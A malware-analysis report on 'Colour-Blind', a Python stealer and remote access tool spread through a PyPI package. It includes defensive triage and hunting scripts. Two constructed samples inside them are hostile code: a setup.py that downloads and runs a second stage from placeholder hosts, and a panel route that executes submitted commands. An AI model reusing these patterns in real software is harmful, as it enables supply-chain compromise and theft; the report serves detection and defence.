Wed, Mar 1, 2023
PyPI Packages Used to Deliver Python Remote Access Tools
- Kroll has identified a fully featured information stealer and remote access tool (RAT) in the Python Package Index (PyPI) that it is calling “Colour-Blind”.
- The malicious package was found as part of a project to obtain more awareness of initial attack vectors and uses a tool developed by Kroll’s threat intelligence team.
- The “Colour-Blind” malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others.
As part of a project to obtain more awareness of initial attack vectors outside of the common phishing and web application exploitation, Kroll’s Cyber Threat Intelligence team has developed a tool to enable the enhanced monitoring of the Python Package Index (PyPI) to find and obtain malicious packages that are added to it.
We have discovered several packages with varying degrees of sophistication. In the following article, we analyze one of the more interesting malicious packages uncovered named “Colour-Blind” by Kroll. Colour-Blind is a fully featured information stealer and remote access tool (RAT) written in Python. In our research, we present a detailed analysis of the functionality and an assessment of the skill level of the actors who have created the malware.
Initial “Colourfool” Discovery
The package “colourfool” was detected by our tool, and a copy was archived for manual inspection shortly after it was uploaded to PyPI.
The package contained only one Python file of note, a suspiciously large “setup.py” last modified four days earlier.
Figure 1 - Malicious Package Files and Meta Data
The sole purpose of the script appeared to be downloading a file from the internet, hiding this activity from the user and executing the file. An install script with that behavior immediately seemed suspicious and likely malicious.
Figure 2 – Second Stage Download and Execution
The function that provided the download URL was also suspicious. It attempted to retrieve a URL from a pastebin[.]com snippet and, failing that, fell back to a hardcoded Discord content delivery network URL. Within a legitimate library, hardcoded URLs for downloading executable resources “on the fly” are uncommon, particularly when those URLs are not persistent and are unlikely to remain reachable after a short period of time.
Figure 3 – Calculation of Second Stage URL
Other suspicious aspects of this script were the redirection of standard output to the null device, and the copying of the downloaded file into the directory in which the interpreter “python.exe” resides. The copy is preceded by a check that forces an exit if the file already exists, a common technique malware uses to avoid reinfecting a host.
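The download-and-execute pattern described above is easy to flag statically before a package is ever installed. The script below is an added example of such a triage check; it is not Kroll’s monitoring tool. The setup.py it inspects is a constructed sample that mirrors the behavior described (Pastebin lookup, Discord CDN fallback, stdout to the null device, copy beside the interpreter, exit if already present); its URLs and package name are placeholders, not the real indicators.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.
Added example; the sample below is constructed and its URLs are placeholders."""
import ast
import re

# Calls that fetch a remote resource, and calls that run something local.
DOWNLOAD_FUNCS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                  "requests.get", "requests.post"}
EXEC_FUNCS = {"os.system", "os.popen", "os.startfile", "subprocess.call",
              "subprocess.run", "subprocess.Popen", "exec", "eval"}
# Throwaway hosting seen in malicious packages but rarely in real build scripts.
HOST_PATTERN = re.compile(r"https?://(?:pastebin\.com|cdn\.discordapp\.com)/", re.I)


def _aliases(tree):
    """Map local names to the module or function they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
                else:                      # 'import a.b' binds the name 'a'
                    head = a.name.split(".")[0]
                    aliases[head] = head
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualified(node, aliases):
    """Return 'pkg.mod.func' for a Name/Attribute chain, resolving import aliases."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage_setup_py(source):
    tree = ast.parse(source)
    aliases = _aliases(tree)
    f = {"download": [], "execute": [], "suspicious_urls": [],
         "devnull": False, "size": len(source)}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _qualified(node.func, aliases)
            if name in DOWNLOAD_FUNCS:
                f["download"].append(name)
            elif name in EXEC_FUNCS:
                f["execute"].append(name)
        elif isinstance(node, ast.Attribute) and node.attr == "devnull":
            f["devnull"] = True            # output silenced, e.g. sys.stdout = open(os.devnull)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if HOST_PATTERN.search(node.value):
                f["suspicious_urls"].append(node.value)
    if f["download"] and f["execute"]:
        f["verdict"] = "download-and-execute"
    elif f["download"] or f["execute"] or f["suspicious_urls"] or f["devnull"]:
        f["verdict"] = "suspicious"
    else:
        f["verdict"] = "clean"
    return f


# Constructed sample modelled on the behaviour described in the text; placeholders only.
SAMPLE_SETUP_PY = '''
import os, sys, subprocess
from urllib.request import urlopen
from setuptools import setup

def stage_url():
    try:
        return urlopen("https://pastebin.com/raw/PLACEHOLDER").read().decode()
    except Exception:
        return "https://cdn.discordapp.com/attachments/0/0/stage2.zip"

def drop_and_run():
    sys.stdout = open(os.devnull, "w")
    dst = os.path.join(os.path.dirname(sys.executable), "code.py")
    if os.path.exists(dst):
        sys.exit()
    with open(dst, "wb") as fh:
        fh.write(urlopen(stage_url()).read())
    subprocess.Popen([sys.executable, dst])

drop_and_run()
setup(name="example-package", version="0.1")
'''

if __name__ == "__main__":
    print(triage_setup_py(SAMPLE_SETUP_PY))
```

Run it against the setup.py of any freshly mirrored package; a “download-and-execute” verdict on an install script is worth a manual look regardless of the package’s stated purpose, since setuptools metadata never needs network access at install time.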
The second stage archive contained only one file “code.py” which was significantly larger than the script analyzed above; this new file was over 300 kilobytes (KB) and 2,038 lines of code.
Figure 4 – Second Stage Meta Data
The new script contains a much larger imports section, including modules that enable malicious activity in the form of keylogging or stealing cookies.
Figure 5 – Imports Section Showing Modules for Lower-Level Access
On looking through the code, some of it is blatantly malicious, for example, a function named “disable_antivirus” where the code attempts to add its location to the Microsoft Defender Antivirus exclusion path in Windows.
Figure 6 – Overtly Malicious Function Name
Defense Evasion Behavior
In some other parts of the code, some attempt at obfuscation was made, although it mostly amounted to variables named with a simple pattern that contained only two characters. This was easy to turn “human readable” by utilizing a regular expression.
Figure 7 – Obfuscated Variable Names
The combination of partially obfuscated code with blatantly named functions such as “disable_antivirus” suggests that not all of the code was developed by a single entity. It is possible that the final developer mostly reused other people’s code, adding it via copy and paste.
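Renaming two-character identifiers is mechanical, but a plain regular expression will also rewrite matching substrings inside string literals and attribute names. The following added example (not Kroll’s script) does the same job on the syntax tree instead, so only real identifiers are touched and imported modules such as `os` or `io` are left alone; the obfuscated snippet it rewrites is constructed, and `ast.unparse` requires Python 3.9 or later.

```python
"""Rename two-character identifiers to consistent readable names.
Added example; the obfuscated snippet below is constructed."""
import ast
import builtins
import re

TWO_CHAR = re.compile(r"^[A-Za-z_]{2}$")   # the simple pattern the malware author used


class _Renamer(ast.NodeTransformer):
    def __init__(self, mapping):
        self.mapping = mapping

    def visit_Name(self, node):
        node.id = self.mapping.get(node.id, node.id)
        return node

    def visit_arg(self, node):
        node.arg = self.mapping.get(node.arg, node.arg)
        return node

    def visit_FunctionDef(self, node):
        node.name = self.mapping.get(node.name, node.name)
        self.generic_visit(node)
        return node


def obfuscated_names(tree):
    """Two-character identifiers in first-seen order, excluding builtins and
    imported names (so 'os' or 'io' are not renamed)."""
    keep = set(dir(builtins))
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            keep.update((a.asname or a.name).split(".")[0] for a in node.names)
    found = []
    for node in ast.walk(tree):
        ident = (node.id if isinstance(node, ast.Name)
                 else node.arg if isinstance(node, ast.arg)
                 else node.name if isinstance(node, ast.FunctionDef) else None)
        if ident and TWO_CHAR.match(ident) and ident not in keep and ident not in found:
            found.append(ident)
    return found


def deobfuscate(source, hints=None):
    """Return (readable_source, mapping). `hints` lets the analyst override the
    generated names once a variable's purpose has been worked out."""
    tree = ast.parse(source)
    mapping = {name: f"var_{i}" for i, name in enumerate(obfuscated_names(tree), 1)}
    mapping.update(hints or {})
    tree = ast.fix_missing_locations(_Renamer(mapping).visit(tree))
    return ast.unparse(tree), mapping


# Constructed sample in the style described: two-character names everywhere.
SAMPLE_OBFUSCATED = '''
import os, sys, requests
def aa(bb):
    cc = requests.get(bb).text
    dd = os.path.join(os.path.dirname(sys.executable), "code.py")
    open(dd, "w").write(cc)
    return dd
'''

if __name__ == "__main__":
    readable, names = deobfuscate(SAMPLE_OBFUSCATED, hints={"aa": "fetch_stage2"})
    print(names)
    print(readable)
```

The mapping is returned alongside the rewritten source so that names chosen by hand can be recorded and reused when a later variant of the same code turns up.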
The second stage contains a URL-retrieval function similar to that of the original script; however, in this stage the Pastebin snippet was encrypted.
Figure 8 – Similar Function to Figure 3, However, a Decryption Routine is Now Present
The key for decrypting this URL was hardcoded in the script, enabling us to obtain the following domain: “clearstride[.]io”.
SSL/TLS certificate information for this domain indicates that the certificate was created on the same date as the original “setup.py” script.
Figure 9 – SSL/TLS Certificate for C2 Domain
The malware starts with a call to an external website to retrieve geolocation and other IP-related information.
Figure 10 – Code for Obtaining Public IP Address Information of Victim Host
A function that looks for indications of running inside a virtual machine is then called.
Figure 11 – Code for Detecting Virtualization Technologies
The final lookup is for the presence of any security research tools running in the system process list.
Figure 12 – Security Tool Search
This kind of defense evasion behavior is typically seen where the actor checks that the malicious code is not running in an automated security sandbox, to avoid it being identified as malicious. In this case, however, after the malware gathers the information it does nothing with most of it; for example, the result of the security research tool search is never referenced or checked. This strengthens the hypothesis that the code has been plagiarized from multiple sources, and that the final developer may not be particularly sophisticated in their methods.
Following this, the code tries to protect itself by using a combination of two functions to terminate processes it deems a threat. The first function is solely dedicated to killing Windows Task Manager.
Figure 13 – Task Manager Kill Code
The second termination function loops through running processes and kills any whose window title contains one of a set of hardcoded strings.
Figure 14 – Code to Find and Terminate Processes Based on Identifying Strings
The malware’s persistence mechanism is to add a Visual Basic (VB) script named “Essentials.vbs” to the “Startup” folder within the user’s “Start Menu”. The VB script runs a Windows batch file that the malware places in the same folder as “python.exe”, and the batch file starts the malware with Python every time the user logs in.
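Both halves of that persistence chain leave file-system artefacts that can be checked on a suspect host. The script below is an added hunting example, not Kroll’s tooling: it lists .vbs files in the per-user Startup folder together with any batch files they reference, and lists script files sitting beside the interpreter binary. The infected-host layout built by `build_sample_tree()` is constructed for offline testing; only the name “Essentials.vbs” comes from the analysis, the batch-file name and VBS contents are assumptions.

```python
"""Hunt for the Colour-Blind persistence artefacts on a Windows host.
Added example, not Kroll's tooling; the batch-file name and VBS contents in
build_sample_tree() are constructed, only 'Essentials.vbs' comes from the analysis."""
import os
import re
import sys
import tempfile
from pathlib import Path

# Per-user Startup folder under %APPDATA%: anything here runs at every logon.
STARTUP_SUBDIR = Path("Microsoft") / "Windows" / "Start Menu" / "Programs" / "Startup"
# A Windows path ending in .bat or .cmd inside the VBS text.
BAT_REF = re.compile(r"[\w:\\./ -]+\.(?:bat|cmd)", re.I)
# File types not expected next to python.exe in a stock interpreter install.
UNEXPECTED_SUFFIXES = {".bat", ".cmd", ".vbs", ".py"}


def user_startup_dir(appdata=None):
    base = appdata if appdata is not None else os.environ.get("APPDATA", "")
    return Path(base) / STARTUP_SUBDIR


def scan_startup_folder(startup):
    """Every .vbs in the Startup folder, with the batch files it references."""
    findings = []
    for script in sorted(Path(startup).glob("*.vbs")):
        text = script.read_text(errors="replace")
        findings.append({"script": script.name,
                         "known_name": script.name.lower() == "essentials.vbs",
                         "bat_refs": BAT_REF.findall(text)})
    return findings


def scan_interpreter_dir(python_dir=None):
    """Script files sitting beside the interpreter binary; triage each by hand."""
    base = Path(python_dir) if python_dir else Path(sys.executable).parent
    return sorted(p.name for p in base.iterdir() if p.suffix.lower() in UNEXPECTED_SUFFIXES)


def hunt(appdata=None, python_dir=None):
    return {"startup": scan_startup_folder(user_startup_dir(appdata)),
            "interpreter_dir": scan_interpreter_dir(python_dir)}


def build_sample_tree():
    """Constructed infected-host layout for offline testing; returns (appdata, python_dir)."""
    root = Path(tempfile.mkdtemp())
    startup = user_startup_dir(root)
    startup.mkdir(parents=True)
    (startup / "Essentials.vbs").write_text(       # assumed VBS body
        'Set sh = CreateObject("WScript.Shell")\n'
        'sh.Run "C:\\Python311\\launcher.bat", 0\n')
    python_dir = root / "Python311"
    python_dir.mkdir()
    for name in ("python.exe", "launcher.bat", "code.py"):   # launcher.bat is an assumed name
        (python_dir / name).write_bytes(b"")
    return str(root), str(python_dir)


if __name__ == "__main__":
    # With no arguments the hunt runs against the current user's real profile and interpreter.
    print(hunt(*build_sample_tree()))
```

On a live host call `hunt()` with no arguments; a .vbs in Startup that launches a batch file next to python.exe is the combination to look for, since neither file is created by a normal Python installation.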
The malware’s function for file exfiltration utilizes “transfer[.]sh,” an anonymous file transfer website that seems to be becoming popular amongst threat actors.
Figure 15 – Data Exfiltration
There appears to be some code related to social engineering, generating an error message trying to persuade the user to re-run as administrator. There is also an embedded “Snake” game that appears to be a direct copy of the code from a GitHub repository. This game doesn’t seem to serve a purpose and didn’t start when the malware was run during testing. This could be another artifact indicating the irregular sourcing of this code.
Figure 16 – Social Engineering Present Within the Source Code
The malware starts multiple threads, including ones dedicated to cookie, password and cryptocurrency wallet theft.
Figure 17 – Multithreading Code
As a method of remote control, the malware starts a Flask web application and exposes it to the internet through Cloudflare’s tunnel client “cloudflared”. The tunnel is an outbound connection from the victim host, so no inbound port needs to be opened and inbound firewall rules do not prevent the actor from reaching the panel.
Colour-Blind Remote Access Tool (RAT) Functionality
The web application serves as a control panel for the malware, and the available options indicate functionality of a Remote Access Trojan (RAT). The web code for this page is basic and looks somewhat childish in aesthetic, giving rise to our tracking name for this malware “Colour-Blind,” based on the original PyPI package name (“colourfool”) and design choices made here.
Figure 18 – Screenshot of the Malware Command Panel
The functionality of the RAT accessible from the control interface includes:
- Tokens: Dumps to the screen login tokens for several applications that use Chromium, either directly or via Electron, as an application framework, a notable example being Discord
- Passwords: Dumps passwords extracted from web browsers to screen
- Cookies: Dumps all browser cookies to screen
- Keys: Dumps the keylogger’s captured data to screen
- Applications: Provides a list of running applications and a button to terminate them
- Data Dump: Sends all captured data to the C2 URL
- Screen: Shows screenshot of the user desktop and allows for rudimentary interaction such as key presses
- IP: Looks up IP information and displays it to screen (using a different function from the one called at startup)
- Open Browser: Opens a browser to a given webpage
- Run: Runs a command via operating system
- Text Input: Sends keystrokes to the machine
- Phantom/Metamask: Steals cryptocurrency wallet information
Figure 19 – Screenshot of Remote Desktop Viewing Functionality
Figure 20 – Process Terminate Panel
Figure 21 – Real-Time Key Logger
Figure 22 – The RAT running and accessible via Cloudflare Tunnel
We further examined the code and extracted all the endpoints of the web application and found several that were not linked from the interface.
Figure 23 – List of all Web Application Endpoints
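Enumerating every route of a Flask-based panel, rather than only the ones the HTML links to, is what surfaces the hidden endpoints. The script below is an added example of that step (not Kroll’s analysis code): it reads `@app.route(...)` decorators from the source, records the HTTP methods and any `request.args`/`request.form` parameters each handler reads, and reports routes that never appear in the panel HTML. The Flask source and panel HTML it parses are constructed samples; the sample references helper functions that do not exist because it is only parsed, never executed.

```python
"""Enumerate Flask routes in a malware control panel and spot unlinked ones.
Added example; SAMPLE_APP and SAMPLE_PANEL_HTML are constructed, not the malware's code."""
import ast
import re

_INDEX = getattr(ast, "Index", ())   # Python 3.8 wraps subscript slices; later versions do not


def _request_param(node):
    """Parameter name read via request.args.get("x") / request.form["x"], else None."""
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "get"):
        container, key = node.func.value, (node.args[0] if node.args else None)
    elif isinstance(node, ast.Subscript):
        container, key = node.value, node.slice
        if isinstance(key, _INDEX):
            key = key.value
    else:
        return None
    if (isinstance(container, ast.Attribute) and container.attr in ("args", "form", "values")
            and isinstance(container.value, ast.Name) and container.value.id == "request"
            and isinstance(key, ast.Constant) and isinstance(key.value, str)):
        return key.value
    return None


def extract_flask_routes(source, app_names=("app",)):
    """All routes registered on the named Flask app objects, sorted by path."""
    tree = ast.parse(source)
    routes = []
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for dec in fn.decorator_list:
            if not (isinstance(dec, ast.Call) and isinstance(dec.func, ast.Attribute)
                    and isinstance(dec.func.value, ast.Name)
                    and dec.func.value.id in app_names
                    and dec.func.attr in ("route", "get", "post", "put", "delete")
                    and dec.args and isinstance(dec.args[0], ast.Constant)):
                continue
            methods = ["GET"] if dec.func.attr == "route" else [dec.func.attr.upper()]
            for kw in dec.keywords:
                if kw.arg == "methods" and isinstance(kw.value, (ast.List, ast.Tuple)):
                    methods = [e.value for e in kw.value.elts if isinstance(e, ast.Constant)]
            params = sorted({p for n in ast.walk(fn) if (p := _request_param(n))})
            routes.append({"path": dec.args[0].value, "handler": fn.name,
                           "methods": methods, "params": params})
    return sorted(routes, key=lambda r: r["path"])


def unlinked_routes(routes, panel_html):
    """Paths that never appear as a quoted string in the panel HTML: functionality
    the operator reaches only by hand-crafting requests."""
    return [r["path"] for r in routes
            if not re.search(r'["\']' + re.escape(r["path"]) + r'["\'?]', panel_html)]


# Constructed sample in the shape described in the text; helper names are placeholders.
SAMPLE_APP = '''
from flask import Flask, request
app = Flask(__name__)

@app.route("/")
def index():
    return PANEL_HTML

@app.route("/passwords")
def passwords():
    return dump_passwords()

@app.route("/run", methods=["POST"])
def run():
    return os.popen(request.form["cmd"]).read()

@app.route("/camera")
def camera():
    return grab_frame()

@app.route("/hvncitem")
def hvncitem():
    return start_hidden(request.args.get("start"))
'''
SAMPLE_PANEL_HTML = ('<a href="/">Home</a> <a href="/passwords">Passwords</a> '
                     '<form action="/run" method="post"></form>')

if __name__ == "__main__":
    found = extract_flask_routes(SAMPLE_APP)
    for r in found:
        print(r)
    print("not linked from panel:", unlinked_routes(found, SAMPLE_PANEL_HTML))
```

The parameter names are the useful part for the next step: once a handler is known to read `start` from the query string, the request in Figure 27 can be reproduced in a lab against the sample without guessing.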
The /camera endpoint allows the attacker to spy on an unsuspecting user via a web camera.
Figure 24 – Web Camera functionality being used to Snoop
There is also a series of endpoints starting with the letters “hvnc,” which deal with a hidden desktop created on the victim’s machine. “/hvncmanager” allows for the starting of a web browser on this hidden desktop.
Figure 25 – Opening of Chrome Web Browser on Hidden Desktop and not Visible to User
“/hvnc” will open the hidden desktop allowing for the threat actor to interact with it via a mouse and keyboard. The ability to open a web browser in a hidden manner allows the threat actor to interact with the victim’s internet accounts, even those which lock a session cookie to an IP address or other unique host identifiers.
Figure 26 – Screenshot of Chrome running inside the Hidden Desktop Visible to Actor
“/hvncitem” enables custom commands to be executed on the hidden desktop via manipulation of the URL parameter “start”.
Figure 27 – Triggering a Process Start Via Manually Manipulating a Request to Malware
Figure 28 – Manually Triggered Process Being Run on Hidden Desktop
What Colour-Blind Tells Us
From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows us how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insights into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities.
- Ensure that all imported libraries are verified by developers
- Consider using deployment processes that sandbox build targets before they are pushed to production
- Use virtualized environments for development tasks that can be rapidly rebuilt should a malicious package be installed